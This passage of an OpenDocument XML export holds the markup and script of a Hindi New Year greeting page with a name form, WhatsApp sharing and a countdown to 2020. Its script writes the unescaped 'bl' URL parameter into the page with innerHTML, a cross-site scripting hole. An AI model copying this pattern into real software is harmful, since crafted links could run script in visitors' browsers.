text:style-name="T3499">1600</text:span><text:span text:style-name="T3500">/Snow_falling</text:span><text:span text:style-name="T3501">1</text:span><text:span text:style-name="T3502">.gif); background-color:; color: white; font-weight: bold; padding-top:<text:s/></text:span><text:span text:style-name="T3503">6</text:span><text:span text:style-name="T3504">px; padding-bottom:<text:s/></text:span><text:span text:style-name="T3505">6</text:span><text:span text:style-name="T3506">px; font-size: large;text-align:center; "&gt;</text:span><text:span text:style-name="T3507"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3507"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3508">&lt;h</text:span><text:span text:style-name="T3509">2<text:s/></text:span><text:span text:style-name="T3510">class="font-effect-neon" align=center" id="wb-show-name"&gt;&lt;/h</text:span><text:span text:style-name="T3511">2</text:span><text:span text:style-name="T3512">&gt;</text:span><text:span text:style-name="T3513"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3514">&lt;h</text:span><text:span text:style-name="T3515">2<text:s/></text:span><text:span text:style-name="T3516">class="font-effect-neon" style="color: #F</text:span><text:span text:style-name="T3517">00</text:span><text:span text:style-name="T3518">;" align=center" id="wb-show-wishing"&gt;&lt;/h</text:span><text:span text:style-name="T3519">2</text:span><text:span text:style-name="T3520">&gt;</text:span><text:span text:style-name="T3521"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3522">&lt;/Div&gt;</text:span><text:span text:style-name="T3523"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3524">&lt;div style="background: url(https://</text:span><text:span text:style-name="T3525">1</text:span><text:span text:style-name="T3526">.bp.blogspot.com/-l</text:span><text:span text:style-name="T3527">0</text:span><text:span text:style-name="T3528">EVRb</text:span><text:span text:style-name="T3529">2</text:span><text:span text:style-name="T3530">fd</text:span><text:span text:style-name="T3531">3</text:span><text:span text:style-name="T3532">Q/WyNAg</text:span><text:span text:style-name="T3533">2</text:span><text:span text:style-name="T3534">N</text:span><text:span text:style-name="T3535">6</text:span><text:span text:style-name="T3536">m</text:span><text:span text:style-name="T3537">6</text:span><text:span text:style-name="T3538">I/AAAAAAAAAag/yA</text:span><text:span text:style-name="T3539">795</text:span><text:span text:style-name="T3540">u</text:span><text:span text:style-name="T3541">9</text:span><text:span text:style-name="T3542">GRJIf-DaE</text:span><text:span text:style-name="T3543">6</text:span><text:span text:style-name="T3544">-UCcWxL_bbdR</text:span><text:span text:style-name="T3545">5</text:span><text:span text:style-name="T3546">rXwCLcBGAs/s</text:span><text:span text:style-name="T3547">1600</text:span><text:span text:style-name="T3548">/Snow_falling</text:span><text:span text:style-name="T3549">1</text:span><text:span text:style-name="T3550">.gif); background-color: ; color: white; font-weight: bold; padding-top:<text:s/></text:span><text:span text:style-name="T3551">6</text:span><text:span text:style-name="T3552">px; padding-bottom:<text:s/></text:span><text:span text:style-name="T3553">6</text:span><text:span text:style-name="T3554">px; font-size: large;text-align:center; "&gt;</text:span><text:span text:style-name="T3555"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3556">&lt;/font&gt;</text:span><text:span text:style-name="T3557"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3558">&lt;/div&gt;&lt;/div&gt;</text:span><text:span text:style-name="T3559"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3560"><text:s/></text:span><text:span text:style-name="T3561"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3562">&lt;/div&gt;</text:span><text:span text:style-name="T3563"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3563"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3564"><text:s/></text:span><text:span text:style-name="T3565"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3566">&lt;img src="https://</text:span><text:span text:style-name="T3567">2</text:span><text:span text:style-name="T3568">.bp.blogspot.com/-PJk-wvKbZhQ/XeeMWDu</text:span><text:span text:style-name="T3569">4</text:span><text:span text:style-name="T3570">EZI/AAAAAAAAALQ/fqzYnJ</text:span><text:span text:style-name="T3571">8</text:span><text:span text:style-name="T3572">rJMYbQC</text:span><text:span text:style-name="T3573">7</text:span><text:span text:style-name="T3574">Y</text:span><text:span text:style-name="T3575">50</text:span><text:span text:style-name="T3576">P</text:span><text:span text:style-name="T3577">7</text:span><text:span text:style-name="T3578">lQasSiCg</text:span><text:span text:style-name="T3579">17</text:span><text:span text:style-name="T3580">fcACLcBGAsYHQ/s</text:span><text:span text:style-name="T3581">1600</text:span><text:span text:style-name="T3582">/Happy-New-Year-Colorful.gif" width="</text:span><text:span text:style-name="T3583">90</text:span><text:span text:style-name="T3584">%"/&gt;&lt;br&gt;&lt;br&gt;</text:span><text:span text:style-name="T3585"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3586">&lt;h</text:span><text:span text:style-name="T3587">2<text:s/></text:span><text:span text:style-name="T3588">class="font-effect-neon" style="color: #F</text:span><text:span text:style-name="T3589">00</text:span><text:span text:style-name="T3590">;" align=center" id="wb-show-wishing"&gt;IN ADVANCE&lt;/h</text:span><text:span text:style-name="T3591">2</text:span><text:span text:style-name="T3592">&gt;&lt;br /&gt;</text:span><text:span text:style-name="T3593"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3594">&lt;h</text:span><text:span text:style-name="T3595">2<text:s/></text:span><text:span text:style-name="T3596">class="font-effect-neon" style="color: #FFFF</text:span><text:span text:style-name="T3597">00</text:span><text:span text:style-name="T3598">;" align=center" id="demoo"&gt;&lt;/h</text:span><text:span text:style-name="T3599">2</text:span><text:span text:style-name="T3600">&gt;</text:span><text:span text:style-name="T3601"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3602">&lt;h</text:span><text:span text:style-name="T3603">2<text:s/></text:span><text:span text:style-name="T3604">class="font-effect-neon" style="color: #F</text:span><text:span text:style-name="T3605">00</text:span><text:span text:style-name="T3606">;" align=center"&gt;LEFT&lt;/h</text:span><text:span text:style-name="T3607">2</text:span><text:span text:style-name="T3608">&gt;&lt;br /&gt;</text:span><text:span text:style-name="T3609"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3609"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3609"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3610">&lt;!-- ADSENSE CODE START HERE --&gt;</text:span><text:span text:style-name="T3611"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3611"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3611"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3612">&lt;!-- ADSENSE CODE END HERE --&gt;</text:span><text:span text:style-name="T3613"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3613"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3613"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3613"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3614">&lt;div class="font-effect-neon"&gt;&lt;p class="fromMessage" id="wb-fromMessage"&gt;&lt;/p&gt;&lt;/div&gt;&lt;br/&gt;</text:span><text:span text:style-name="T3615"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3615"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3616">&lt;center&gt;</text:span><text:span text:style-name="T3617"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3618">&lt;img src="https://</text:span><text:span text:style-name="T3619">2</text:span><text:span text:style-name="T3620">.bp.blogspot.com/-qvodD</text:span><text:span text:style-name="T3621">3</text:span><text:span text:style-name="T3622">CU</text:span><text:span text:style-name="T3623">4</text:span><text:span text:style-name="T3624">o</text:span><text:span text:style-name="T3625">4</text:span><text:span text:style-name="T3626">/XeeKksHzJZI/AAAAAAAAALE/</text:span><text:span text:style-name="T3627">9</text:span><text:span text:style-name="T3628">Iiudxbph</text:span><text:span text:style-name="T3629">9</text:span><text:span text:style-name="T3630">YX</text:span><text:span text:style-name="T3631">5</text:span><text:span text:style-name="T3632">gPSzuzrfj</text:span><text:span text:style-name="T3633">6</text:span><text:span text:style-name="T3634">NWf</text:span><text:span text:style-name="T3635">0</text:span><text:span text:style-name="T3636">iU</text:span><text:span text:style-name="T3637">0</text:span><text:span text:style-name="T3638">iMgCLcBGAsYHQ/s</text:span><text:span text:style-name="T3639">1600</text:span><text:span text:style-name="T3640">/tenor%</text:span><text:span text:style-name="T3641">2</text:span><text:span text:style-name="T3642">B%</text:span><text:span text:style-name="T3643">25281</text:span><text:span text:style-name="T3644">%</text:span><text:span text:style-name="T3645">2529</text:span><text:span text:style-name="T3646">.gif" width="</text:span><text:span text:style-name="T3647">90</text:span><text:span text:style-name="T3648">%"/&gt;&lt;br&gt;&lt;br&gt;</text:span><text:span text:style-name="T3649"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3649"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3649"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3650">&lt;img src="https://</text:span><text:span text:style-name="T3651">2</text:span><text:span text:style-name="T3652">.bp.blogspot.com/-xMB</text:span><text:span text:style-name="T3653">45</text:span><text:span text:style-name="T3654">zlECxA/XeeJVz</text:span><text:span text:style-name="T3655">3</text:span><text:span text:style-name="T3656">TrjI/AAAAAAAAAK</text:span><text:span text:style-name="T3657">4</text:span><text:span text:style-name="T3658">/gqRB</text:span><text:span text:style-name="T3659">76</text:span><text:span text:style-name="T3660">ZlH</text:span><text:span text:style-name="T3661">58</text:span><text:span text:style-name="T3662">gEU</text:span><text:span text:style-name="T3663">8827</text:span><text:span text:style-name="T3664">ZXYGJBMH</text:span><text:span text:style-name="T3665">05</text:span><text:span text:style-name="T3666">ZcYqwCLcBGAsYHQ/s</text:span><text:span text:style-name="T3667">1600</text:span><text:span text:style-name="T3668">/tenor.gif"width="</text:span><text:span text:style-name="T3669">90</text:span><text:span text:style-name="T3670">%"<text:s/></text:span><text:span text:style-name="T3671"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3672">/&gt;</text:span><text:span text:style-name="T3673"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3674">&lt;br&gt;&lt;br&gt;</text:span><text:span text:style-name="T3675"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3675"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3675"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3675"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3675"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3675"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3676">&lt;audio controls src="https://webbeast.in/crackers.mp</text:span><text:span text:style-name="T3677">3</text:span><text:span text:style-name="T3678">" loop&gt;&lt;/audio&gt;&lt;br /&gt;</text:span><text:span text:style-name="T3679"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3680">&lt;/center&gt;</text:span><text:span text:style-name="T3681"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3682">&lt;/br&gt;</text:span><text:span text:style-name="T3683"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3684">&lt;span style="background-color: green; color: white; font-family: &amp;quot;tahoma&amp;quot; , &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size:<text:s/></text:span><text:span text:style-name="T3685">18</text:span><text:span text:style-name="T3686">pt;"&gt;&amp;nbsp;<text:s/></text:span><text:span text:style-name="T3687">🌠</text:span><text:span text:style-name="T3688">अपनेे दोस्तों के साथ शेयर करो<text:s/></text:span><text:span text:style-name="T3689">🌠</text:span><text:span text:style-name="T3690"><text:s/></text:span><text:span text:style-name="T3691">&lt;/span&gt;&lt;/div&gt;</text:span><text:span text:style-name="T3692"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3693">&lt;/br&gt;</text:span><text:span text:style-name="T3694"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3694"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3695">&lt;center&gt;</text:span><text:span text:style-name="T3696"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3697">&lt;img height="</text:span><text:span text:style-name="T3698">70</text:span><text:span text:style-name="T3699">px" src="https://</text:span><text:span text:style-name="T3700">4</text:span><text:span text:style-name="T3701">.bp.blogspot.com/-_ZpU-nyCpMc/WyNC</text:span><text:span text:style-name="T3702">8</text:span><text:span text:style-name="T3703">YxwrfI/AAAAAAAAAaw/KXfG</text:span><text:span text:style-name="T3704">3</text:span><text:span text:style-name="T3705">ltVcsgu</text:span><text:span text:style-name="T3706">57</text:span><text:span text:style-name="T3707">_M</text:span><text:span text:style-name="T3708">4</text:span><text:span text:style-name="T3709">_Fa</text:span><text:span text:style-name="T3710">7</text:span><text:span text:style-name="T3711">dZEaRVu</text:span><text:span text:style-name="T3712">1</text:span><text:span text:style-name="T3713">EyGACLcBGAs/s</text:span><text:span text:style-name="T3714">1600</text:span><text:span text:style-name="T3715">/c.gif" width="</text:span><text:span text:style-name="T3716">110</text:span><text:span text:style-name="T3717">px" /&gt;</text:span><text:span text:style-name="T3718"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3719">&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;</text:span><text:span text:style-name="T3720"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3720"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3720"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3720"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3721">&lt;div id="formBox" &gt;</text:span><text:span text:style-name="T3722"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3723"><text:s/></text:span><text:span text:style-name="T3724"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3725">&lt;input type="text" name="name" id="nameTextBox" placeholder="Enter your Name"&gt;</text:span><text:span text:style-name="T3726"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3727"><text:s/>&lt;div id="goButton" onclick="createGreeting()" &gt;</text:span><text:span text:style-name="T3728"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3729"><text:s/>Go</text:span><text:span text:style-name="T3730"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3731"><text:s/>&lt;/div&gt;</text:span><text:span text:style-name="T3732"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3733"><text:s/>&lt;/div&gt;</text:span><text:span text:style-name="T3734"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3735"><text:s/>&lt;a class="footerbtn" href="javascript:void(</text:span><text:span text:style-name="T3736">0</text:span><text:span text:style-name="T3737">)" onclick="shareActionWA()"&gt;</text:span><text:span text:style-name="T3738"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3739"><text:s/>&lt;img width="</text:span><text:span text:style-name="T3740">25</text:span><text:span text:style-name="T3741">px" height="</text:span><text:span text:style-name="T3742">25</text:span><text:span text:style-name="T3743">px" src="https://</text:span><text:span text:style-name="T3744">1</text:span><text:span text:style-name="T3745">.bp.blogspot.com/-FPl</text:span><text:span text:style-name="T3746">7</text:span><text:span text:style-name="T3747">NXcc</text:span><text:span text:style-name="T3748">74</text:span><text:span text:style-name="T3749">k/XY</text:span><text:span text:style-name="T3750">75</text:span><text:span text:style-name="T3751">aGhffoI/AAAAAAAABOs/</text:span><text:span text:style-name="T3752">0</text:span><text:span text:style-name="T3753">rSjgCkFr</text:span><text:span text:style-name="T3754">78</text:span><text:span text:style-name="T3755">U</text:span><text:span text:style-name="T3756">1</text:span><text:span text:style-name="T3757">GbfVhjOpY</text:span><text:span text:style-name="T3758">1</text:span><text:span text:style-name="T3759">RgwO_l</text:span><text:span text:style-name="T3760">5</text:span><text:span text:style-name="T3761">uzgCLcBGAsYHQ/s</text:span><text:span text:style-name="T3762">1600</text:span><text:span text:style-name="T3763">/webbeast</text:span><text:span text:style-name="T3764">1</text:span><text:span text:style-name="T3765">.png"&gt;</text:span><text:span text:style-name="T3766"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3767"><text:s/>&lt;b style="font-size:<text:s/></text:span><text:span text:style-name="T3768">15</text:span><text:span text:style-name="T3769">px;position: relative;top: -</text:span><text:span text:style-name="T3770">3</text:span><text:span text:style-name="T3771">px;margin:<text:s/></text:span><text:span text:style-name="T3772">0 10</text:span><text:span text:style-name="T3773">px;"&gt;Share with your Friends&lt;/b&gt;</text:span><text:span text:style-name="T3774"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3775"><text:s/>&lt;img width="</text:span><text:span text:style-name="T3776">25</text:span><text:span text:style-name="T3777">px" height="</text:span><text:span text:style-name="T3778">25</text:span><text:span text:style-name="T3779">px" src="https://</text:span><text:span text:style-name="T3780">1</text:span><text:span text:style-name="T3781">.bp.blogspot.com/-FPl</text:span><text:span text:style-name="T3782">7</text:span><text:span text:style-name="T3783">NXcc</text:span><text:span text:style-name="T3784">74</text:span><text:span text:style-name="T3785">k/XY</text:span><text:span text:style-name="T3786">75</text:span><text:span text:style-name="T3787">aGhffoI/AAAAAAAABOs/</text:span><text:span text:style-name="T3788">0</text:span><text:span text:style-name="T3789">rSjgCkFr</text:span><text:span text:style-name="T3790">78</text:span><text:span text:style-name="T3791">U</text:span><text:span text:style-name="T3792">1</text:span><text:span text:style-name="T3793">GbfVhjOpY</text:span><text:span text:style-name="T3794">1</text:span><text:span text:style-name="T3795">RgwO_l</text:span><text:span text:style-name="T3796">5</text:span><text:span text:style-name="T3797">uzgCLcBGAsYHQ/s</text:span><text:span text:style-name="T3798">1600</text:span><text:span text:style-name="T3799">/webbeast</text:span><text:span text:style-name="T3800">1</text:span><text:span text:style-name="T3801">.png"&gt;</text:span><text:span text:style-name="T3802"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3803"><text:s/>&lt;/a&gt;</text:span><text:span text:style-name="T3804"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3805"><text:s/>&lt;/div&gt;</text:span><text:span text:style-name="T3806"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3807"><text:s/></text:span><text:span text:style-name="T3808"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3808"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3808"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3809">&lt;/body&gt;</text:span><text:span text:style-name="T3810"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3811">.</text:span><text:span text:style-name="T3812"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3813"><text:s/>. &lt;script&gt;</text:span><text:span text:style-name="T3814"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3815"><text:s/>var jqs = function(sParam) {</text:span><text:span text:style-name="T3816"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3817"><text:s/>var sPageURL = window.location.search.substring(</text:span><text:span text:style-name="T3818">1</text:span><text:span text:style-name="T3819">);</text:span><text:span text:style-name="T3820"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3821"><text:s/>var sURLVariables = sPageURL.split("&amp;");</text:span><text:span text:style-name="T3822"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3823"><text:s/>for (var i =<text:s/></text:span><text:span text:style-name="T3824">0</text:span><text:span text:style-name="T3825">; i &lt; sURLVariables.length; i++) {</text:span><text:span text:style-name="T3826"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3827"><text:s/>var sParameterName = sURLVariables[i].split("=");</text:span><text:span text:style-name="T3828"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3829"><text:s/>if (sParameterName[</text:span><text:span text:style-name="T3830">0</text:span><text:span text:style-name="T3831">] === sParam) {</text:span><text:span text:style-name="T3832"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3833"><text:s/>return sParameterName[</text:span><text:span text:style-name="T3834">1</text:span><text:span text:style-name="T3835">];</text:span><text:span text:style-name="T3836"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3837"><text:s/>}</text:span><text:span text:style-name="T3838"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3839"><text:s/>}</text:span><text:span text:style-name="T3840"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3841"><text:s/>};</text:span><text:span text:style-name="T3842"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3843"><text:s/>window.jqs = jqs;</text:span><text:span text:style-name="T3844"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3845"><text:s/>var name = decodeURI(jqs("bl"));</text:span><text:span text:style-name="T3846"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3847"><text:s/>if (typeof jqs("bl") === "undefined") {</text:span><text:span text:style-name="T3848"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3849"><text:s/>name = "";</text:span><text:span text:style-name="T3850"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3851"><text:s/>}</text:span><text:span text:style-name="T3852"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3853"><text:s/>var checkName = function() {</text:span><text:span text:style-name="T3854"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3855"><text:s/>if (name.length !==<text:s/></text:span><text:span text:style-name="T3856">0</text:span><text:span text:style-name="T3857">) {</text:span><text:span text:style-name="T3858"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3859"><text:s/>name = name.replace(/-/g, " ");</text:span><text:span text:style-name="T3860"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3861"><text:s/>console.log("name is there", name);</text:span><text:span text:style-name="T3862"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3863"><text:s/>document.querySelector("#wb-show-name").innerHTML = name;</text:span><text:span text:style-name="T3864"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3865"><text:s/>document.querySelector("#wb-show-wishing").innerHTML = "</text:span><text:span text:style-name="T3866">की ओर से</text:span><text:span text:style-name="T3867">";</text:span><text:span text:style-name="T3868"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3869"><text:s/>document.querySelector("#wb-fromMessage").innerHTML= ""</text:span><text:span text:style-name="T3870"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3871"><text:s/>} else {</text:span><text:span text:style-name="T3872"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3872"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3873"><text:s/>}</text:span><text:span text:style-name="T3874"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3875"><text:s/>};</text:span><text:span text:style-name="T3876"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3876"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3877"><text:s/>checkName();</text:span><text:span text:style-name="T3878"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3878"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3879"><text:s/>var createGreeting=function(){</text:span><text:span text:style-name="T3880"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3881"><text:s/>sname=document.querySelector("#nameTextBox").value;</text:span><text:span text:style-name="T3882"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3883"><text:s/>sname=sname.replace(/@/g,"-")</text:span><text:span text:style-name="T3884"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3885"><text:s/>sname=sname.replace(/%</text:span><text:span text:style-name="T3886">40</text:span><text:span text:style-name="T3887">/g,"-")</text:span><text:span text:style-name="T3888"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3889"><text:s/>sname=sname.replace(/\./g,"-")</text:span><text:span text:style-name="T3890"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3891"><text:s/>if(sname.trim()!=""){</text:span><text:span text:style-name="T3892"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3893"><text:s/>document.querySelector("#formBox").style.display = "none";</text:span><text:span text:style-name="T3894"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3895"><text:s/>document.querySelector(".footerbtn").style.display = "block";</text:span><text:span text:style-name="T3896"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3897"><text:s/>document.querySelector("#wb-show-name").innerHTML = sname;</text:span><text:span text:style-name="T3898"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3899"><text:s/>document.querySelector("#wb-show-wishing").innerHTML = "</text:span><text:span text:style-name="T3900">की ओर से</text:span><text:span text:style-name="T3901">";</text:span><text:span text:style-name="T3902"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3903"><text:s/>document.querySelector("#wb-fromMessage").innerHTML= "Share with your Friends &amp; Family";</text:span><text:span text:style-name="T3904"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3905"><text:s/>window.scrollTo(</text:span><text:span text:style-name="T3906">0,0</text:span><text:span text:style-name="T3907">);</text:span><text:span text:style-name="T3908"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3909"><text:s/>}else {</text:span><text:span text:style-name="T3910"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3911"><text:s/>alert ("Please Type Your Name First");</text:span><text:span text:style-name="T3912"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3913"><text:s/>document.getElementById("nameTextBox").focus();</text:span><text:span text:style-name="T3914"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3915"><text:s/>}</text:span><text:span text:style-name="T3916"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3917"><text:s/>}</text:span><text:span text:style-name="T3918"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3918"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3919"><text:s/>var shareActionWA = function() {</text:span><text:span text:style-name="T3920"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3921"><text:s/>var shareString = "";</text:span><text:span text:style-name="T3922"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3923"><text:s/>var whatsappHref;</text:span><text:span text:style-name="T3924"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3925"><text:s/>shareString += "*"+sname+"*";</text:span><text:span text:style-name="T3926"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3926"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3927"><text:s/></text:span><text:span text:style-name="T3928"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3929"><text:s/>shareString +="<text:s/></text:span><text:span text:style-name="T3930">ने आपके लिए कुछ खास<text:s/></text:span><text:span text:style-name="T3931">🎁</text:span><text:span text:style-name="T3932">भेजा है</text:span><text:span text:style-name="T3933">%</text:span><text:span text:style-name="T3934">0</text:span><text:span text:style-name="T3935">A*</text:span><text:span text:style-name="T3936">नीचे दी गई ब्लू लाइन को क्लिक करें</text:span><text:span text:style-name="T3937">*</text:span><text:span text:style-name="T3938">🙏</text:span><text:span text:style-name="T3939">%</text:span><text:span text:style-name="T3940">0</text:span><text:span text:style-name="T3941">A</text:span><text:span text:style-name="T3942">👇👇👇👇</text:span><text:span text:style-name="T3943"><text:s/></text:span><text:span text:style-name="T3944">%</text:span><text:span text:style-name="T3945">0</text:span><text:span text:style-name="T3946">A"</text:span><text:span text:style-name="T3947"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3948"><text:s/>shareString +=(window.location.href.split("?")[</text:span><text:span text:style-name="T3949">0</text:span><text:span text:style-name="T3950">] + "?bl=" + sname).replace("#", "").replace(/ /g, "-");</text:span><text:span text:style-name="T3951"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3952"><text:s/></text:span><text:span text:style-name="T3953"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3953"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3954"><text:s/>whatsappHref = "whatsapp://send?text=" + shareString;</text:span><text:span text:style-name="T3955"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3956"><text:s/>window.location.href = whatsappHref;</text:span><text:span text:style-name="T3957"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3957"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3958"><text:s/>};</text:span><text:span text:style-name="T3959"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3960"><text:s/>var countDownDate = new Date("January<text:s/></text:span><text:span text:style-name="T3961">1</text:span><text:span text:style-name="T3962">,<text:s/></text:span><text:span text:style-name="T3963">2020 00:00:00</text:span><text:span text:style-name="T3964">").getTime();</text:span><text:span text:style-name="T3965"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3965"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3966"><text:s/>// Update the count down every<text:s/></text:span><text:span text:style-name="T3967">1<text:s/></text:span><text:span text:style-name="T3968">second</text:span><text:span text:style-name="T3969"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3970"><text:s/>var x = setInterval(function() {</text:span><text:span text:style-name="T3971"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3972"><text:s/>// Get todays date and time</text:span><text:span text:style-name="T3973"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3974"><text:s/>var now = new Date().getTime();</text:span><text:span text:style-name="T3975"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3975"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3976"><text:s/>// Find the distance between now an the count down date</text:span><text:span text:style-name="T3977"/></text:p>
